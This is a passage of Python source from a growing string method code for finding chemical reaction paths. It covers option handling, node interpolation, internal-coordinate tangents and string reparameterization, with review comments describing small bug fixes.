    opt.add_option(
        key='ID',
        value=0,
        required=False,
        doc='A number for identification of Strings'
    )

    opt.add_option(
        key='interp_method',
        value='DLC',
        allowed_values=['Geodesic', 'DLC'],
        required=False,
        doc='Which reparameterization method to use',
    )

    opt.add_option(
        key='noise',
        value=100.0,
        allowed_types=[float],
        required=False,
        doc='Noise to check for intermediate',
    )

    GSM._default_options = opt
    return GSM._default_options.copy()
@classmethod
def from_options(cls, **kwargs):
    """Alternate constructor: build an instance from keyword overrides of
    the default options."""
    opts = cls.default_options()
    return cls(opts.set_values(kwargs))
@classmethod
def copy_from_options(cls, gsm_obj, reactant, product):
    """Build a new string from an existing one's options, swapping in new
    reactant and product molecules.

    Bug fix: the Options object was previously passed positionally to
    ``from_options``, which accepts only keyword arguments and would raise
    TypeError; pass the prepared options straight to the constructor, the
    same way ``from_options`` itself does.
    """
    new_options = gsm_obj.options.copy().set_values({'reactant': reactant, 'product': product})
    new_gsm = cls(new_options)
    return new_gsm
def __init__(
        self,
        options,
):
    """ Constructor

    options: an options.Options instance carrying every setting declared
    in default_options() (reactant/product, optimizer, tolerances, ...).
    """
    self.options = options

    # Working directory for intermediate files.
    os.system('mkdir -p scratch')

    # Cache attributes
    self.nnodes = self.options['nnodes']
    self.nodes = [None]*self.nnodes
    self.nodes[0] = self.options['reactant']
    self.nodes[-1] = self.options['product']
    self.driving_coords = self.options['driving_coords']
    self.growth_direction = self.options['growth_direction']
    self.isRestarted = False
    self.DQMAG_MAX = self.options['DQMAG_MAX']
    self.DQMAG_MIN = self.options['DQMAG_MIN']
    self.BDIST_RATIO = self.options['BDIST_RATIO']
    self.ID = self.options['ID']
    self.optimizer = []
    self.interp_method = self.options['interp_method']
    self.CONV_TOL = self.options['CONV_TOL']
    self.noise = self.options['noise']
    self.mp_cores = self.options['mp_cores']
    self.xyz_writer = self.options['xyz_writer']

    # One optimizer clone per node so per-node settings don't interfere.
    optimizer = options['optimizer']
    for count in range(self.nnodes):
        self.optimizer.append(optimizer.__class__(optimizer.options.copy()))
    self.print_level = options['print_level']

    # Set initial values
    self.current_nnodes = 2
    self.nR = 1
    self.nP = 1
    self.climb = False
    self.find = False
    self.ts_exsteps = 3  # multiplier for ts node
    self.n0 = 1  # something to do with added nodes? "first node along current block"
    self.end_early = False
    self.tscontinue = True  # whether to continue with TS opt or not
    self.found_ts = False
    self.rn3m6 = np.sqrt(3.*self.nodes[0].natoms-6.)
    self.gaddmax = self.options['ADD_NODE_TOL']  # self.options['ADD_NODE_TOL']/self.rn3m6;
    print(" gaddmax:", self.gaddmax)
    self.ictan = [None]*self.nnodes
    self.active = [False] * self.nnodes
    self.climber = False  # is this string a climber?
    self.finder = False  # is this string a finder?
    self.done_growing = False
    self.nclimb = 0
    self.nhessreset = 10  # are these used??? TODO
    self.hessrcount = 0  # are these used?! TODO
    self.hess_counter = 0  # it is probably good to reset the hessian
    self.newclimbscale = 2.
    self.TS_E_0 = None
    self.dE_iter = 100.  # change in max TS node
    self.nopt_intermediate = 0  # might be a duplicate of endearly_counter
    self.flag_intermediate = False
    self.endearly_counter = 0  # Find the intermediate x time
    self.pot_min = []
    self.ran_out = False  # if it ran out of iterations

    self.newic = Molecule.copy_from_options(self.nodes[0])  # newic object is used for coordinate transformations
@property
def TSnode(self):
    """Index of the node with the maximum energy (the TS guess)."""
    # Penalty-PES strings are treated specially: the penalty inflates the
    # energy with energy differences, which can mislead climbing image,
    # so average the two underlying surfaces instead.
    uses_penalty = (
        self.__class__.__name__ != "SE_Cross"
        and self.nodes[0].PES.__class__.__name__ == "Penalty_PES"
    )
    if uses_penalty:
        avg_energies = np.asarray([0.] * self.nnodes)
        for idx, node in enumerate(self.nodes):
            if node is not None:
                avg_energies[idx] = (node.PES.PES1.energy + node.PES.PES2.energy) / 2.
        return int(np.argmax(avg_energies))

    # Exclude the endpoints so the TS can never be node 0 or the last node.
    interior = self.energies[1:self.nnodes - 1]
    return int(np.argmax(interior) + 1)
@property
def emax(self):
    """Energy (relative to node 0) of the current TS node."""
    ts_index = self.TSnode
    return self.energies[ts_index]
@property
def npeaks(self):
    '''
    Number of interior local maxima along the string's energy profile.
    '''
    # NOTE(review): minnodes is collected but never used in the return
    # value; only the count of maxima matters here.
    minnodes = []
    maxnodes = []
    energies = self.energies
    if energies[1] > energies[0]:
        minnodes.append(0)
    if energies[self.nnodes-1] < energies[self.nnodes-2]:
        minnodes.append(self.nnodes-1)
    # Scan interior nodes for local minima/maxima (strict comparisons).
    for n in range(self.n0, self.nnodes-1):
        if energies[n+1] > energies[n]:
            if energies[n] < energies[n-1]:
                minnodes.append(n)
        if energies[n+1] < energies[n]:
            if energies[n] > energies[n-1]:
                maxnodes.append(n)

    return len(maxnodes)
@property
def energies(self):
    '''
    Energies of the string, relative to the reactant node (node 0).
    '''
    reference = self.nodes[0].energy
    return [node.energy - reference for node in self.nodes if node is not None]
@energies.setter
def energies(self, list_of_E):
    '''
    setter for energies
    '''
    # NOTE(review): this stores to self.E while the getter recomputes from
    # the nodes, so the two are not kept in sync — confirm callers rely on
    # reading .E rather than the property after setting.
    self.E = list_of_E
@property
def geometries(self):
    """Geometries of all existing (non-None) nodes along the string."""
    return [node.geometry for node in self.nodes if node is not None]
@property
def gradrmss(self):
    """RMS gradients of all existing nodes (also cached on self._gradrmss)."""
    self._gradrmss = [node.gradrms for node in self.nodes if node is not None]
    return self._gradrmss
@property
def dEs(self):
    """Difference energies of all existing nodes (also cached on self._dEs)."""
    self._dEs = [node.difference_energy for node in self.nodes if node is not None]
    return self._dEs
@property
def ictan(self):
    # Internal-coordinate tangent vectors, one entry per node.
    return self._ictan

@ictan.setter
def ictan(self, value):
    self._ictan = value
@property
def dqmaga(self):
    # Magnitudes of the internal-coordinate tangents, one entry per node.
    return self._dqmaga

@dqmaga.setter
def dqmaga(self, value):
    self._dqmaga = value
@staticmethod
def add_xyz_along_tangent(
        xyz1,
        constraints,
        step,
        coord_obj,
):
    """Displace xyz1 by `step` along the constrained tangent direction and
    return the resulting Cartesian geometry."""
    displacement = step * constraints
    return coord_obj.newCartesian(xyz1, displacement)
@staticmethod
def add_node(
        nodeR,
        nodeP,
        stepsize,
        node_id,
        **kwargs
):
    '''
    Add a node between nodeR and nodeP or if nodeP is none use driving coordinate to add new node

    nodeR/nodeP: flanking Molecule nodes (nodeP may be None for single-ended growth)
    stepsize:    fraction of the tangent to step (double-ended case)
    node_id:     id assigned to the newly created Molecule
    kwargs:      driving_coords, DQMAG_MAX, DQMAG_MIN (single-ended case only)
    Returns the new Molecule, or None if bdist is already too small to grow.
    '''
    # get driving coord
    driving_coords = kwargs.get('driving_coords', None)
    DQMAG_MAX = kwargs.get('DQMAG_MAX', 0.8)
    DQMAG_MIN = kwargs.get('DQMAG_MIN', 0.2)

    if nodeP is None:
        # Single-ended growth: step along the driving-coordinate tangent.
        if driving_coords is None:
            raise RuntimeError("You didn't supply a driving coordinate and product node is None!")
        BDISTMIN = 0.05
        ictan, bdist = GSM.get_tangent(nodeR, None, driving_coords=driving_coords)

        if bdist < BDISTMIN:
            print("bdist too small %.3f" % bdist)
            return None
        new_node = Molecule.copy_from_options(nodeR, new_node_id=node_id)
        new_node.update_coordinate_basis(constraints=ictan)
        constraint = new_node.constraints[:, 0]
        sign = -1.

        # Scale the step between DQMAG_MIN and DQMAG_MAX according to how
        # far the node still is from the driving-coordinate targets.
        dqmag_scale = 1.5
        minmax = DQMAG_MAX - DQMAG_MIN
        a = bdist/dqmag_scale
        if a > 1.:
            a = 1.
        dqmag = sign*(DQMAG_MIN+minmax*a)
        if dqmag > DQMAG_MAX:
            dqmag = DQMAG_MAX
        print(" dqmag: %4.3f from bdist: %4.3f" % (dqmag, bdist))

        dq0 = dqmag*constraint
        print(" dq0[constraint]: %1.3f" % dqmag)

        new_node.update_xyz(dq0)
        new_node.bdist = bdist
    else:
        # Double-ended: interpolate a fraction of the way toward nodeP.
        ictan, _ = GSM.get_tangent(nodeR, nodeP)
        nodeR.update_coordinate_basis(constraints=ictan)
        constraint = nodeR.constraints[:, 0]
        dqmag = np.linalg.norm(ictan)
        print(" dqmag: %1.3f" % dqmag)
        # sign=-1
        sign = 1.
        dqmag *= (sign*stepsize)
        print(" scaled dqmag: %1.3f" % dqmag)

        dq0 = dqmag*constraint
        old_xyz = nodeR.xyz.copy()
        new_xyz = nodeR.coord_obj.newCartesian(old_xyz, dq0)
        new_node = Molecule.copy_from_options(MoleculeA=nodeR, xyz=new_xyz, new_node_id=node_id)

    return new_node
@staticmethod
def interpolate_xyz(nodeR, nodeP, stepsize):
    '''
    Return Cartesian coordinates a fraction `stepsize` of the way from
    nodeR toward nodeP along the internal-coordinate tangent.
    '''
    ictan, _ = GSM.get_tangent(nodeR, nodeP)
    Vecs = nodeR.update_coordinate_basis(constraints=ictan)
    constraint = nodeR.constraints[:, 0]
    # Project the constrained direction back into primitive coordinates to
    # measure the full tangent length.
    prim_constraint = block_matrix.dot(Vecs, constraint)
    dqmag = np.dot(prim_constraint.T, ictan)
    print(" dqmag: %1.3f" % dqmag)
    # sign=-1
    sign = 1.
    dqmag *= (sign*stepsize)
    print(" scaled dqmag: %1.3f" % dqmag)

    step_vector = dqmag * constraint
    starting_xyz = nodeR.xyz.copy()
    return nodeR.coord_obj.newCartesian(starting_xyz, step_vector)
@staticmethod
def interpolate(start_node, end_node, num_interp):
    '''
    Create num_interp interior nodes between start_node and end_node,
    alternately growing from the reactant and product ends.
    '''
    nifty.printcool(" interpolate")

    num_nodes = num_interp + 2
    nodes = [None]*(num_nodes)
    nodes[0] = start_node
    nodes[-1] = end_node

    # sign alternates which side (reactant/product) is grown this pass.
    sign = 1
    # nR / nP count nodes grown from the reactant / product ends; nn is
    # the total number of placed nodes.
    nR = 1
    nP = 1
    nn = nR + nP

    for n in range(num_interp):
        # Shrink the step as the two frontiers approach each other.
        if num_nodes - nn > 1:
            stepsize = 1./float(num_nodes - nn)
        else:
            stepsize = 0.5
        if sign == 1:
            # Grow one node from the reactant side toward the product frontier.
            iR = nR-1
            iP = num_nodes - nP
            iN = nR
            nodes[nR] = GSM.add_node(nodes[iR], nodes[iP], stepsize, iN)
            if nodes[nR] is None:
                raise RuntimeError
            # print(" Energy of node {} is {:5.4}".format(nR,nodes[nR].energy-E0))
            nR += 1
            nn += 1
        else:
            # Grow one node from the product side toward the reactant frontier.
            n1 = num_nodes - nP
            n2 = n1 - 1
            n3 = nR - 1
            nodes[n2] = GSM.add_node(nodes[n1], nodes[n3], stepsize, n2)
            if nodes[n2] is None:
                raise RuntimeError
            # print(" Energy of node {} is {:5.4}".format(nR,nodes[nR].energy-E0))
            nP += 1
            nn += 1
        sign *= -1

    return nodes
@staticmethod
def get_tangent_xyz(xyz1, xyz2, prim_coords):
    """Primitive-internal-coordinate difference vector between two
    geometries, returned as a column array; Distance primitives are
    weighted by 2.5 relative to angles/torsions."""
    weighted_diffs = [
        (2.5 if type(prim) is Distance else 1.0) * prim.calcDiff(xyz2, xyz1)
        for prim in prim_coords
    ]
    return np.reshape(np.asarray(weighted_diffs, dtype=float), (-1, 1))
@staticmethod
def get_tangent(node1, node2, print_level=1, **kwargs):
    '''
    Get internal coordinate tangent between two nodes, assumes they have unique IDs

    Returns (ictan, bdist): the primitive-internal-coordinate difference
    vector as a column array, and — in the single-ended (driving
    coordinate) case — the remaining "bond distance" to the targets.
    bdist is None in the two-node case.

    Bug fix: the torsion and out-of-plane bdist conditions previously read
    ``x > 0.1 or x < 0.1``, which is true for every value except exactly
    0.1; the intent (mirroring the ADD/BREAK threshold logic) is
    ``abs(x) > 0.1`` so that only significant deviations contribute.
    '''
    if node2 is not None and node1.node_id != node2.node_id:
        # Two-node tangent: primitive differences, distances weighted 2.5x.
        print(" getting tangent from between %i %i pointing towards %i" % (node2.node_id, node1.node_id, node2.node_id))
        assert node2 is not None, 'node n2 is None'

        PMDiff = np.zeros(node2.num_primitives)
        for k, prim in enumerate(node2.primitive_internal_coordinates):
            if type(prim) is Distance:
                PMDiff[k] = 2.5 * prim.calcDiff(node2.xyz, node1.xyz)
            else:
                PMDiff[k] = prim.calcDiff(node2.xyz, node1.xyz)

        return np.reshape(PMDiff, (-1, 1)), None
    else:
        # Single-ended tangent built from the driving coordinates.
        print(" getting tangent from node ", node1.node_id)

        driving_coords = kwargs.get('driving_coords', None)
        assert driving_coords is not None, " Driving coord is None!"

        c = Counter(elem[0] for elem in driving_coords)
        nadds = c['ADD']
        nbreaks = c['BREAK']
        # NOTE(review): these look up the literal keys 'nangles' and
        # 'ntorsions' (not 'ANGLE'/'TORSION') and are unused below.
        nangles = c['nangles']
        ntorsions = c['ntorsions']

        ictan = np.zeros((node1.num_primitives, 1), dtype=float)
        # breakdq = 0.3
        bdist = 0.0
        atoms = node1.atoms
        xyz = node1.xyz.copy()

        for i in driving_coords:
            if "ADD" in i:
                # order indices to avoid duplicate bonds
                if i[1] < i[2]:
                    index = [i[1]-1, i[2]-1]
                else:
                    index = [i[2]-1, i[1]-1]
                bond = Distance(index[0], index[1])
                prim_idx = node1.coord_obj.Prims.dof_index(index, 'Distance')
                if len(i) == 3:
                    # TODO why not just use the covalent radii?
                    d0 = (atoms[index[0]].vdw_radius + atoms[index[1]].vdw_radius)/2.8
                elif len(i) == 4:
                    d0 = i[3]
                current_d = bond.value(xyz)

                # TODO don't set tangent if value is too small
                ictan[prim_idx] = -1*(d0-current_d)
                # if nbreaks>0:
                #     ictan[prim_idx] *= 2

                # => calc bdist <=
                if current_d > d0:
                    bdist += np.dot(ictan[prim_idx], ictan[prim_idx])
                if print_level > 0:
                    print(" bond %s target (less than): %4.3f current d: %4.3f diff: %4.3f " % ((i[1], i[2]), d0, current_d, ictan[prim_idx]))

            elif "BREAK" in i:
                # order indices to avoid duplicate bonds
                if i[1] < i[2]:
                    index = [i[1]-1, i[2]-1]
                else:
                    index = [i[2]-1, i[1]-1]
                bond = Distance(index[0], index[1])
                prim_idx = node1.coord_obj.Prims.dof_index(index, 'Distance')
                if len(i) == 3:
                    d0 = (atoms[index[0]].vdw_radius + atoms[index[1]].vdw_radius)
                elif len(i) == 4:
                    d0 = i[3]
                current_d = bond.value(xyz)

                ictan[prim_idx] = -1*(d0-current_d)

                # => calc bdist <=
                if current_d < d0:
                    bdist += np.dot(ictan[prim_idx], ictan[prim_idx])

                if print_level > 0:
                    print(" bond %s target (greater than): %4.3f, current d: %4.3f diff: %4.3f " % ((i[1], i[2]), d0, current_d, ictan[prim_idx]))

            elif "ANGLE" in i:
                if i[1] < i[3]:
                    index = [i[1]-1, i[2]-1, i[3]-1]
                else:
                    index = [i[3]-1, i[2]-1, i[1]-1]
                angle = Angle(index[0], index[1], index[2])
                prim_idx = node1.coord_obj.Prims.dof_index(index, 'Angle')
                anglet = i[4]
                ang_value = angle.value(xyz)
                ang_diff = anglet*np.pi/180. - ang_value
                # print(" angle: %s is index %i " %(angle,ang_idx))
                if print_level > 0:
                    print((" anglev: %4.3f align to %4.3f diff(rad): %4.3f" % (ang_value, anglet, ang_diff)))
                ictan[prim_idx] = -ang_diff
                # TODO need to come up with an adist
                # if abs(ang_diff)>0.1:
                #     bdist+=ictan[ICoord1.BObj.nbonds+ang_idx]*ictan[ICoord1.BObj.nbonds+ang_idx]

            elif "TORSION" in i:
                if i[1] < i[4]:
                    index = [i[1]-1, i[2]-1, i[3]-1, i[4]-1]
                else:
                    index = [i[4]-1, i[3]-1, i[2]-1, i[1]-1]
                torsion = Dihedral(index[0], index[1], index[2], index[3])
                prim_idx = node1.coord_obj.Prims.dof_index(index, 'Dihedral')
                tort = i[5]
                torv = torsion.value(xyz)
                # Wrap the difference into (-180, 180] degrees.
                tor_diff = tort - torv*180./np.pi
                if tor_diff > 180.:
                    tor_diff -= 360.
                elif tor_diff < -180.:
                    tor_diff += 360.
                ictan[prim_idx] = -tor_diff*np.pi/180.

                # FIXED: was `> 0.1 or < 0.1` (always true); only count
                # torsions that deviate by more than 0.1 rad.
                if abs(tor_diff)*np.pi/180. > 0.1:
                    bdist += np.dot(ictan[prim_idx], ictan[prim_idx])
                if print_level > 0:
                    print((" current torv: %4.3f align to %4.3f diff(deg): %4.3f" % (torv*180./np.pi, tort, tor_diff)))

            elif "OOP" in i:
                index = [i[1]-1, i[2]-1, i[3]-1, i[4]-1]
                oop = OutOfPlane(index[0], index[1], index[2], index[3])
                prim_idx = node1.coord_obj.Prims.dof_index(index, 'OutOfPlane')
                oopt = i[5]
                oopv = oop.value(xyz)
                # Wrap the difference into (-180, 180] degrees.
                oop_diff = oopt - oopv*180./np.pi
                if oop_diff > 180.:
                    oop_diff -= 360.
                elif oop_diff < -180.:
                    oop_diff += 360.
                ictan[prim_idx] = -oop_diff*np.pi/180.

                # FIXED: was `> 0.1 or < 0.1` (always true); only count
                # out-of-planes that deviate by more than 0.1 rad.
                if abs(oop_diff)*np.pi/180. > 0.1:
                    bdist += np.dot(ictan[prim_idx], ictan[prim_idx])
                if print_level > 0:
                    print((" current oopv: %4.3f align to %4.3f diff(deg): %4.3f" % (oopv*180./np.pi, oopt, oop_diff)))

        bdist = np.sqrt(bdist)
        if np.all(ictan == 0.0):
            raise RuntimeError(" All elements are zero")
        return ictan, bdist
@staticmethod
def get_tangents(nodes, n0=0, print_level=0):
    """
    Compute the normalized internal-coordinate tangent between every pair of
    consecutive nodes on the string, together with the step magnitudes.

    Parameters
    ----------
    nodes : list of molecule objects making up the string
    n0 : int, first node of interest (tangents are built for k > n0)
    print_level : int, verbosity

    Returns
    -------
    (ictan, dqmaga) : list of normalized tangent vectors and the list of
    their pre-normalization magnitudes (dqmaga[k] is the distance between
    node k-1 and node k in primitive internal coordinates).
    """
    num_nodes = len(nodes)
    dqmaga = [0.]*num_nodes
    ictan = [[]]*num_nodes

    for k in range(n0+1, num_nodes):
        # Both endpoints of the segment must exist before a tangent is taken.
        assert nodes[k] is not None, "n is bad"
        assert nodes[k-1] is not None, "n-1 is bad"
        raw_tan = GSM.get_tangent_xyz(nodes[k-1].xyz, nodes[k].xyz,
                                      nodes[0].primitive_internal_coordinates)
        dqmaga[k] = 0.
        step_mag = np.linalg.norm(raw_tan)
        dqmaga[k] = step_mag
        # Normalize; the magnitude is kept separately in dqmaga.
        ictan[k] = raw_tan / step_mag
        if dqmaga[k] < 0.:
            raise RuntimeError

    if print_level > 1:
        print('------------printing ictan[:]-------------')
        for k in range(n0+1, num_nodes):
            print("ictan[%i]" % k)
            print(ictan[k].T)
    if print_level > 0:
        print('------------printing dqmaga---------------')
        for k in range(n0+1, num_nodes):
            print(" {:5.4}".format(dqmaga[k]), end='')
            if k % 5 == 0:
                print()
        print()
    return ictan, dqmaga
@staticmethod
def get_three_way_tangents(nodes, energies, find=True, n0=0, print_level=0):
    """
    Tangents along the string, with a blended ("three-way") tangent at the
    TS node: the two tangents surrounding the highest-energy node are mixed
    with energy-difference weights so the TS tangent points uphill.

    Parameters
    ----------
    nodes : list of molecule objects
    energies : list of energies (kcal/mol), one per node
    find : bool, kept for interface compatibility (unused here)
    n0 : int, first node of interest
    print_level : int, verbosity

    Returns
    -------
    (ictan, dqmaga) : normalized tangents and their magnitudes
    """
    num_nodes = len(nodes)
    ictan = [[]]*num_nodes
    dqmaga = [0.]*num_nodes

    ts = np.argmax(energies)  # TS may legitimately land on an endpoint
    at_last = (ts == num_nodes-1)
    at_first = (ts == 0)
    if at_first or at_last:
        print("*********** This will cause a range error in the following for loop *********")
        print("** Setting the middle of the string to be TS node to get proper directions **")
        ts = num_nodes//2

    for n in range(n0, num_nodes):
        print('getting tan[{%s}]' % n)
        if n < ts:
            # Reactant side: tangent built from this node toward the next.
            ictan0, _ = GSM.get_tangent(nodes[n], nodes[n+1])
        elif n > ts:
            # Product side: tangent built from the previous node toward this one.
            ictan0, _ = GSM.get_tangent(nodes[n-1], nodes[n])
        else:
            # TS node: blend the tangents on either side.
            if at_first or at_last:
                t1, _ = GSM.get_tangent(nodes[n+1], nodes[n])
                t2, _ = GSM.get_tangent(nodes[n], nodes[n-1])
                print(" done 3 way tangent")
                ictan0 = t1 + t2
            else:
                dE1 = abs(energies[n+1]-energies[n])
                dE2 = abs(energies[n] - energies[n-1])
                dEmax = max(dE1, dE2)
                dEmin = min(dE1, dE2)
                # Weight toward the higher-energy neighbor.
                if energies[n+1] > energies[n-1]:
                    f1 = dEmax/(dEmax+dEmin+0.00000001)
                else:
                    f1 = 1 - dEmax/(dEmax+dEmin+0.00000001)
                print(' 3 way tangent ({}): f1:{:3.2}'.format(n, f1))
                t1, _ = GSM.get_tangent(nodes[n+1], nodes[n])
                t2, _ = GSM.get_tangent(nodes[n], nodes[n-1])
                print(" done 3 way tangent")
                ictan0 = f1*t1 + (1.-f1)*t2
        ictan[n] = ictan0/np.linalg.norm(ictan0)
        dqmaga[n] = np.linalg.norm(ictan0)
    return ictan, dqmaga
@staticmethod
def ic_reparam(nodes, energies, climbing=False, ic_reparam_steps=8, print_level=1, NUM_CORE=1, MAXRE=0.25):
    '''
    Reparameterize the string using delocalized internal coordinates,
    respacing each side of the TS node separately when climbing.
    Only pushes nodes outwards during reparameterization because otherwise
    too many things change. Be careful, however, if the path is all-uphill
    or all-downhill, as that can cause problems.

    Parameters
    ----------
    nodes : list of molecule objects (modified in place)
    energies : list of energies in kcal/mol
    climbing : bool, hold the TS node fixed and respace each side separately
    ic_reparam_steps : int max number of reparameterization steps
    print_level : int verbosity
    NUM_CORE : int, >1 distributes the basis/coordinate updates over a pool
    MAXRE : float, maximum allowed displacement per node per step
    '''
    nifty.printcool("reparametrizing string nodes")
    nnodes = len(nodes)
    # Ideal fraction of the total arc length between adjacent nodes.
    rpart = np.zeros(nnodes)
    for n in range(1, nnodes):
        rpart[n] = 1./(nnodes-1)
    deltadqs = np.zeros(nnodes)
    TSnode = np.argmax(energies)
    disprms = 100
    if ((TSnode == nnodes-1) or (TSnode == 0)) and climbing:
        raise RuntimeError(" TS node shouldn't be the first or last node")

    # Target per-node progress: uniform overall, or uniform on each side of
    # the TS node (which itself does not move) when climbing.
    ideal_progress_gained = np.zeros(nnodes)
    if climbing:
        for n in range(1, TSnode):
            ideal_progress_gained[n] = 1./(TSnode)
        for n in range(TSnode+1, nnodes):
            ideal_progress_gained[n] = 1./(nnodes-TSnode-1)
        ideal_progress_gained[TSnode] = 0.
    else:
        for n in range(1, nnodes):
            ideal_progress_gained[n] = 1./(nnodes-1)

    for i in range(ic_reparam_steps):
        ictan, dqmaga = GSM.get_tangents(nodes)
        totaldqmag = np.sum(dqmaga)

        # Actual fraction of progress made at each node along the string.
        if climbing:
            progress = np.zeros(nnodes)
            progress_gained = np.zeros(nnodes)
            h1dqmag = np.sum(dqmaga[:TSnode+1])
            h2dqmag = np.sum(dqmaga[TSnode+1:nnodes])
            if print_level > 0:
                print(" h1dqmag, h2dqmag: %3.2f %3.2f" % (h1dqmag, h2dqmag))
            progress_gained[:TSnode] = dqmaga[:TSnode]/h1dqmag
            progress_gained[TSnode+1:] = dqmaga[TSnode+1:]/h2dqmag
            progress[:TSnode] = np.cumsum(progress_gained[:TSnode])
            progress[TSnode:] = np.cumsum(progress_gained[TSnode:])
        else:
            progress = np.cumsum(dqmaga)/totaldqmag
            progress_gained = dqmaga/totaldqmag

        if i == 0:
            # Remember the starting spacings for the final report.
            orig_dqmaga = copy(dqmaga)
            orig_progress_gained = copy(progress_gained)

        # Arc-length displacement needed to reach the ideal spacing.
        if climbing:
            difference = np.zeros(nnodes)
            for n in range(TSnode):
                difference[n] = ideal_progress_gained[n] - progress_gained[n]
                deltadqs[n] = difference[n]*h1dqmag
            for n in range(TSnode+1, nnodes):
                difference[n] = ideal_progress_gained[n] - progress_gained[n]
                deltadqs[n] = difference[n]*h2dqmag
        else:
            difference = ideal_progress_gained - progress_gained
            deltadqs = difference*totaldqmag

        if print_level > 1:
            print(" ideal progress gained per step", end=' ')
            for n in range(nnodes):
                print(" step [{}]: {:1.3f}".format(n, ideal_progress_gained[n]), end=' ')
            print()
            print(" path progress ", end=' ')
            for n in range(nnodes):
                print(" step [{}]: {:1.3f}".format(n, progress_gained[n]), end=' ')
            print()
            print(" difference ", end=' ')
            for n in range(nnodes):
                print(" step [{}]: {:1.3f}".format(n, difference[n]), end=' ')
            print()
            print(" deltadqs ", end=' ')
            for n in range(nnodes):
                print(" step [{}]: {:1.3f}".format(n, deltadqs[n]), end=' ')
            print()

        # RMS displacement over the string; used as the convergence check.
        # disprms = np.linalg.norm(deltadqs)/np.sqrt(nnodes-1)
        disprms = np.linalg.norm(deltadqs)/np.sqrt(nnodes-1)
        print(" disprms: {:1.3}\n".format(disprms))

        if disprms < 0.02:
            break

        # Move nodes
        if climbing:
            # Fold the (unmovable) neighbors' displacements back onto the
            # interior, clamp to MAXRE, then accumulate outward on each side.
            deltadqs[TSnode-2] -= deltadqs[TSnode-1]
            deltadqs[nnodes-2] -= deltadqs[nnodes-1]
            for n in range(1, nnodes-1):
                if abs(deltadqs[n]) > MAXRE:
                    deltadqs[n] = np.sign(deltadqs[n])*MAXRE
            for n in range(TSnode-1):
                deltadqs[n+1] += deltadqs[n]
            for n in range(TSnode+1, nnodes-2):
                deltadqs[n+1] += deltadqs[n]
            for n in range(nnodes):
                if abs(deltadqs[n]) > MAXRE:
                    deltadqs[n] = np.sign(deltadqs[n])*MAXRE

            if NUM_CORE > 1:
                # 5/14/2021 TS node fucks this up?!
                # Choose tangent n (toward previous) for negative moves,
                # tangent n+1 (toward next) for positive moves.
                tans = [ictan[n] if deltadqs[n] < 0 else ictan[n+1] for n in chain(range(1, TSnode), range(TSnode+1, nnodes-1))]  # + [ ictan[n] if deltadqs[n]<0 else ictan[n+1] for n in range(TSnode+1,nnodes-1)]
                pool = mp.Pool(NUM_CORE)
                Vecs = pool.map(worker, ((nodes[0].coord_obj, "build_dlc", node.xyz, tan) for node, tan in zip(nodes[1:TSnode] + nodes[TSnode+1:nnodes-1], tans)))
                pool.close()
                pool.join()
                for n, node in enumerate(nodes[1:TSnode] + nodes[TSnode+1:nnodes-1]):
                    node.coord_basis = Vecs[n]

                # move the positions
                dqs = [deltadqs[n]*nodes[n].constraints[:, 0] for n in chain(range(1, TSnode), range(TSnode+1, nnodes-1))]
                pool = mp.Pool(NUM_CORE)
                newXyzs = pool.map(worker, ((node.coord_obj, "newCartesian", node.xyz, dq) for node, dq in zip(nodes[1:TSnode] + nodes[TSnode+1:nnodes-1], dqs)))
                pool.close()
                pool.join()
                for n, node in enumerate(nodes[1:TSnode] + nodes[TSnode+1:nnodes-1]):
                    node.xyz = newXyzs[n]
            else:
                for n in chain(range(1, TSnode), range(TSnode+1, nnodes-1)):
                    # Negative displacement: move along tangent n (toward the
                    # previous node); positive: along tangent n+1.
                    if deltadqs[n] < 0:
                        # print(f" Moving node {n} along tan[{n}] this much {deltadqs[n]}")
                        print(" Moving node {} along tan[{}] this much {}".format(n, n, deltadqs[n]))
                        nodes[n].update_coordinate_basis(ictan[n])
                        constraint = nodes[n].constraints[:, 0]
                        dq = deltadqs[n]*constraint
                        nodes[n].update_xyz(dq, verbose=(print_level > 1))
                    elif deltadqs[n] > 0:
                        print(" Moving node {} along tan[{}] this much {}".format(n, n+1, deltadqs[n]))
                        nodes[n].update_coordinate_basis(ictan[n+1])
                        constraint = nodes[n].constraints[:, 0]
                        dq = deltadqs[n]*constraint
                        nodes[n].update_xyz(dq, verbose=(print_level > 1))
        else:
            # e.g 11-2 = 9, deltadq[9] -= deltadqs[10]
            deltadqs[nnodes-2] -= deltadqs[nnodes-1]
            for n in range(1, nnodes-1):
                if abs(deltadqs[n]) > MAXRE:
                    deltadqs[n] = np.sign(deltadqs[n])*MAXRE
            for n in range(1, nnodes-2):
                deltadqs[n+1] += deltadqs[n]
            for n in range(1, nnodes-1):
                if abs(deltadqs[n]) > MAXRE:
                    deltadqs[n] = np.sign(deltadqs[n])*MAXRE

            if NUM_CORE > 1:
                # Update the coordinate basis
                tans = [ictan[n] if deltadqs[n] < 0 else ictan[n+1] for n in range(1, nnodes-1)]
                pool = mp.Pool(NUM_CORE)
                Vecs = pool.map(worker, ((nodes[0].coord_obj, "build_dlc", node.xyz, tan) for node, tan in zip(nodes[1:nnodes-1], tans)))
                pool.close()
                pool.join()
                for n, node in enumerate(nodes[1:nnodes-1]):
                    node.coord_basis = Vecs[n]

                # move the positions
                dqs = [deltadqs[n]*nodes[n].constraints[:, 0] for n in range(1, nnodes-1)]
                pool = mp.Pool(NUM_CORE)
                newXyzs = pool.map(worker, ((node.coord_obj, "newCartesian", node.xyz, dq) for node, dq in zip(nodes[1:nnodes-1], dqs)))
                pool.close()
                pool.join()
                for n, node in enumerate(nodes[1:nnodes-1]):
                    node.xyz = newXyzs[n]
            else:
                for n in range(1, nnodes-1):
                    if deltadqs[n] < 0:
                        # print(f" Moving node {n} along tan[{n}] this much {deltadqs[n]}")
                        print(" Moving node {} along tan[{}] this much {}".format(n, n, deltadqs[n]))
                        nodes[n].update_coordinate_basis(ictan[n])
                        constraint = nodes[n].constraints[:, 0]
                        dq = deltadqs[n]*constraint
                        nodes[n].update_xyz(dq, verbose=(print_level > 1))
                    elif deltadqs[n] > 0:
                        print(" Moving node {} along tan[{}] this much {}".format(n, n+1, deltadqs[n]))
                        nodes[n].update_coordinate_basis(ictan[n+1])
                        constraint = nodes[n].constraints[:, 0]
                        dq = deltadqs[n]*constraint
                        nodes[n].update_xyz(dq, verbose=(print_level > 1))

    # Final pass: recompute the spacings for the report printed below.
    if climbing:
        ictan, dqmaga = GSM.get_tangents(nodes)
        h1dqmag = np.sum(dqmaga[:TSnode+1])
        h2dqmag = np.sum(dqmaga[TSnode+1:nnodes])
        if print_level > 0:
